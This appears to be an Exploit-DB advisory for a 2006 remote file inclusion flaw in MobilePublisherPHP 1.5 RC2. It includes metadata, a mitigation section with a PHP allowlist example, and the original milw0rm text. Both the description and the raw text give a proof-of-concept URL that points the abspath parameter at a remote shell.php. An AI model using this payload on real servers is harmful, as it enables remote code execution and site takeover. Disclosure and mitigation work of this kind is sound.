Vendor: MobilePublisherPHP
By: Timq
CVSS: 7.5 (HIGH)
Title: Remote Include Vulnerability
CWE: 98
Product Name: MobilePublisherPHP
Affected Version From: 1.5 RC2
Affected Version To: 1.5 RC2
Patch Exists: YES
Related CWE: N/A
CPE: a:mobilepublisherphp:mobilepublisherphp:1.5rc2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MobilePublisherPHP 1.5 RC2 (functions.php) Remote Include Vulnerability

Discovered by Timq. The vulnerable statement require $abspath."/functions.php"; takes its include path from the abspath request parameter, so it can be exploited by sending a malicious URL such as http://site.com/[dir]/header.php?abspath=http://site.com/shell.php? to the target server.

Mitigation:

Validate and sanitize the abspath input before it reaches the require statement, to prevent malicious code execution.
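
One way to apply this mitigation, as an added example that is not MobilePublisherPHP code or part of the original advisory: the include base is fixed server-side and only allowlisted file names are resolved. APP_ROOT, ALLOWED_INCLUDES and resolve_include() are hypothetical names, and the demo directory and inputs are constructed.

```php
<?php
declare(strict_types=1);

// Added example; names are hypothetical, not MobilePublisherPHP identifiers.
// Vulnerable pattern from the advisory, kept as a comment:
//   require $abspath."/functions.php";   // $abspath reachable from the request

const APP_ROOT = __DIR__;                    // base path fixed server-side
const ALLOWED_INCLUDES = ['functions.php'];  // the only files that may be loaded

function resolve_include(string $name, string $root = APP_ROOT): string
{
    // Allowlist first: URLs, wrappers and ../ sequences never match an entry.
    if (!in_array($name, ALLOWED_INCLUDES, true)) {
        throw new InvalidArgumentException("include not allowed: $name");
    }
    $base = realpath($root);
    // realpath() only resolves local files and returns false for remote URLs.
    $path = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("include resolves outside the application root");
    }
    return $path;
}

// Constructed demo: a temporary application root with a stub functions.php.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mp_demo_' . getmypid();
mkdir($root);
file_put_contents($root . '/functions.php', '<?php function mp_loaded() { return true; }');

require resolve_include('functions.php', $root);
var_dump(mp_loaded());

// Constructed bad inputs: a traversal attempt and a remote URL.
foreach (['../functions.php', 'http://attacker.invalid/functions.php'] as $bad) {
    try {
        resolve_include($bad, $root);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}

unlink($root . '/functions.php');
rmdir($root);
```

Setting allow_url_include = Off in php.ini blocks remote include targets independently of this check.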

Exploit-DB raw data:

MobilePublisherPHP 1.5 RC2 (functions.php) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

Email: timq[at]hackernetwork[dot]com

##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################

# milw0rm.com [2006-09-17]